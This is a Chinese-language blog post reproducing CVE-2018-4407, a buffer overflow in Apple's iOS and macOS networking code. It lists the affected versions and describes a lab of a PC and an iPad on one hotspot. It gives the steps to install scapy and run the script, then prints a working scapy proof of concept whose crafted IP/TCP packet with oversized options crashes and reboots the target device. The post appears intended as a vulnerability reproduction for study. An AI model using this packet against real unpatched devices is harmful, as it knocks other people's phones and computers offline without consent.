1. Home
  2. 系统
  3. Mac

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

环境:用手机开启的热点,pc本一台,ipad一台

pc电脑:192.168.43.30

ipad:192.168.43.145

影响版本

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):
所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):
所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

首先设备需要连接在同一个局域网内

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

然后查看你的苹果系统版本是否符合、这里是11的版本那么可以使用这个poc进行复现的

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

安装scapy模块
pip install scapy

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

执行脚本程序
python cve-2018-4407.py

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

最后执行成功、iPad被重启

附上poc

#pip install scapy

import scapy
from scapy.all import *

send(IP(dst="192.168.43.145",options=[IPOption("A"*8)])/TCP(dport=2323,
options=[(19, "1"*18),(19, "2"*18)]))

文章转载零组攻防实验室

其他文献参考:
FreeBuf
FreeBuf

作者:GD-sec,如若转载,请注明出处:https://www.6r6.cc/system/558.html
文章内容包括PDF与软件、文章图片等内容来自于互联网、若您下载了本站分享的软件、PDF等内容下载后请于24小时内删除、与本站无任何关联、本站所有内容基于个人学习,勿做任何非法使用、本站也不传播非法内容、谢谢合作!若有侵权请联系我们下架处理-GD-sec诡道网络诡道安全

Leave a Reply

Your email address will not be published. Required fields are marked *

18 − 13 =

Comments(1)

  • qaq 2019年1月7日 pm5:33

    6666666666666666